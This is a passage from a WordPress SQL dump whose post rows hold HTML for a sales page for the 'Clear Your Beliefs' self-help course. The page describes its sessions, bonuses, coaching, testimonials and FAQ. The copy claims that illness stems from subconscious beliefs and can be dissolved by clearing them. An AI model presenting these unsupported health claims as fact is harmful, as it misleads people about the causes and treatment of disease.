difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;margin-right: 60px;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right; right;margin-right: 60px;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right; right;margin-right: 60px;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n<div style="text-align: right;"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'copy of cyb', '', 'inherit', 'closed', 'open', '', '936-revision-v1', '', '', '2014-06-17 17:07:31', '2014-06-17 22:07:31', '', 936, 'http://clearyourbeliefs.com/936-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(951, 2, '2014-06-19 02:19:37', '2014-06-19 07:19:37', '<div style="width: 115%; margin-left: -40px;">\n\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\n</div>\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n&nbsp;\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" 